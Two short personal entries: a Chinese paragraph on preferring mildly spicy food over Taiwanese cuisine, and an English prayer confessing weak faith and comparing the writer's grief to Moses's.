我覺得我還是喜歡有點小辣的菜式，特別是擁有自己特色的菜式。雖然台灣菜很好看，變化很多，但始終覺得少了辣味，菜的味道就變淡了。少了辣味就等於少了一些味道。

Dear Lord,

I am sorry that I do not have my faith upon you. When I look upon Moses, my grief is far less than him. Lord, Let me learn how to look upon you.
